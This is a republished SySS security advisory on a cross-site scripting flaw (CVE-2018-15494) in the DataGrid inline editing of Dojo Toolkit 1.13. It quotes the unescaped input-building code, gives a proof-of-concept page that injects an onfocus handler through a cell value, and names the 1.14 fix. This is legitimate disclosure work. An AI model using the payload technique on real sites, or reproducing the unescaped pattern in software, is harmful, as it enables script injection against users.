Dojo Toolkit 1.13 Cross Site Scripting

🗓️ 27 Aug 2018 00:00:00Reported by Moritz BechlerType

packetstorm🔗 packetstormsecurity.com👁 808 Views

Dojo Toolkit 1.13 Cross Site Scripting, improper escaping in dojox.grid.DataGrid component editing mode

Reporter	Title	Published	Views	Family All 62
IBM Security Bulletins	Security Bulletin: IBM InfoSphere Information Server is affected by an unescaped string injection in Dojo Toolkit	8 Dec 202021:03	–	ibm
IBM Security Bulletins	Security Bulletin: A Security vulnerability found in Dojo Toolkit which is shipped with IBM Security Identity Management product (CVE-2018-15494)	11 Oct 202218:54	–	ibm
IBM Security Bulletins	Security Bulletin: Multiple vulnerabilities in IBM WebSphere eXtreme Scale Liberty Deployment.	21 Mar 202318:07	–	ibm
IBM Security Bulletins	Security Bulletin:Due to use of Dojo Toolkit before 1.14 in IBM Tivoli Network Manager is vulnerable to unescaped string injection in dojox/Grid/DataGrid(CVE-2018-15494)	4 Jul 202212:52	–	ibm
IBM Security Bulletins	Security Bulletin: XSS vulerability in Dojo affects IBM Tivoli Business Service Manager (CVE-2018-15494)	5 Nov 202121:06	–	ibm
IBM Security Bulletins	Security Bulletin: Vulnerability in Dojo may affect IBM Cúram Social Program Management (CVE-2018-15494)	25 Nov 202117:06	–	ibm
IBM Security Bulletins	Security Bulletin: Multiple vulnerabilities in Open Source software used by Cloud Pak System	31 Mar 202314:10	–	ibm
IBM Security Bulletins	Security Bulletin: Security vulnerabilities in Dojo and jQuery might affect IBM Business Automation Workflow and IBM Business Process Manager (BPM)	14 Sep 202215:28	–	ibm
IBM Security Bulletins	Security Bulletin: IBM Cognos TM1 is affected by multiple vulnerabilities (CVE-2018-15494, CVE-2019-4245)	29 Jun 201902:10	–	ibm
IBM Security Bulletins	Security Bulletin: Financial Transaction Manager for ACH Services is affected by a potential cross-site scripting (XSS) vulnerability (CVE-2018-15494)	12 Sep 201913:42	–	ibm

`Advisory ID: SYSS-2018-010  
Product: Dojo Toolkit  
Manufacturer: JS Foundation  
Affected Version(s): 1.13  
Tested Version(s): 1.13, 1.10.7  
Vulnerability Type: Cross-Site Scripting (CWE-79)  
Risk Level: Medium  
Solution Status: Fixed  
Manufacturer Notification: 2018-07-02  
Solution Date: 2018-10-13  
Public Disclosure: 2018-10-24  
CVE Reference: CVE-2018-15494  
Author of Advisory: Moritz Bechler, SySS GmbH  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Overview:  
  
Dojo Toolkit is a JavaScript framework for building JavaScript based  
applications.  
  
The manufacturer describes the product as follows (see [1]):  
  
"A JavaScript toolkit that saves you time and scales with your  
development process.  
Provides everything you need to build a Web app.  
Language utilities, UI components, and more, all in one place, designed  
to work together perfectly."  
  
Due to improper escaping, applications using Dojo Toolkit may be  
vulnerable to  
cross-site scripting.  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Vulnerability Details:  
  
The inline editing feature of the dojox.grid.DataGrid component fails to  
properly  
escape the cell value when using it as the input field's value attribute  
while  
editing is activated by clicking.  
  
> formatEditing: function(inDatum, inRowIndex){  
> this.needFormatNode(inDatum, inRowIndex);  
> return '<input class="dojoxGridInput" type="text" value="' +  
inDatum + '">';  
> },  
  
  
That allows additional element attributes to be introduced, including an  
"onfocus"  
handler that will immediately get executed when editing mode is activated.  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Proof-of-Concept (PoC):  
  
  
Demo website with Dojo's dojox.grid.DataGrid component:  
  
<!DOCTYPE html>  
<html>  
<head>  
<meta charset="utf-8" />  
<style type="text/css">  
@import  
"https://ajax.googleapis.com/ajax/libs/dojo/1.13.0/dojox/grid/resources/Grid.css";  
html, body {  
width: 100%; height: 100%;  
}  
</style>  
</head>  
<body>  
<script type="text/javascript"  
src="https://ajax.googleapis.com/ajax/libs/dojo/1.13.0/dojo/dojo.js"></script>  
<script type="text/javascript">  
dojo.require("dojox.grid.DataGrid");  
dojo.require("dojo.data.ItemFileWriteStore");  
  
dojo.addOnLoad(function(){  
var g = new dojox.grid.DataGrid({  
store: new dojo.data.ItemFileWriteStore({  
data: {"items" : [ {"foo" : 'bar" onfocus="alert(1)"'} ] }  
}),  
structure: [  
{ field: 'foo', width : '100%', editable: true }  
]  
});  
dojo.byId("container").appendChild(g.domNode);  
g.startup();  
});  
</script>  
<div id="container" style="width: 100%; height: 100%;"></div>  
</body>  
</html>  
  
When clicking the table row to start editing, the cell value is inserted  
into a  
text input's value attribute without proper escaping, resulting in  
markup like  
  
<input class="dojoxGridInput" value="bar" onfocus="alert(1)" "=""  
type="text">  
  
which introduces JavaScript code in the "onfocus" handler that gets  
immediately  
executed.  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Solution:  
  
Update to version 1.14 of Dojo Toolkit.  
  
More Information:  
  
Vendor announcement: https://dojotoolkit.org/blog/dojo-1-14-released  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Disclosure Timeline:  
  
2018-06-04: Vulnerability discovered  
2018-07-02: Vulnerability reported to manufacturer  
2018-10-13: Patch released by manufacturer  
2018-10-24: Public disclosure of vulnerability  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
References:  
  
[1] Product website for Dojo Toolkit  
https://dojotoolkit.org/  
[2] SySS Security Advisory SYSS-2018-010  
  
https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2018-010.txt  
[3] SySS Responsible Disclosure Policy  
https://www.syss.de/en/news/responsible-disclosure-policy/  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Credits:  
  
This security vulnerability was found by Moritz Bechler of SySS GmbH.  
  
E-Mail: [email protected]  
Public Key: ://www.syss.de/fileadmin/dokumente/PGPKeys/Moritz_Bechler.asc  
Key ID: 0x768EFE2BB3E53DDA  
Key Fingerprint: 2C8F F101 9D77 BDE6 465E CCC2 768E FE2B B3E5 3DDA  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Disclaimer:  
  
The information provided in this security advisory is provided "as is"  
and without warranty of any kind. Details of this security advisory may  
be updated in order to provide as accurate information as possible. The  
latest version of this security advisory is available on the SySS web  
site.  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Copyright:  
  
Creative Commons - Attribution (by) - Version 3.0  
URL: http://creativecommons.org/licenses/by/3.0/deed.en  
  
  
`

27 Aug 2018 00:00Current

8High risk

Vulners AI Score8

EPSS0.00704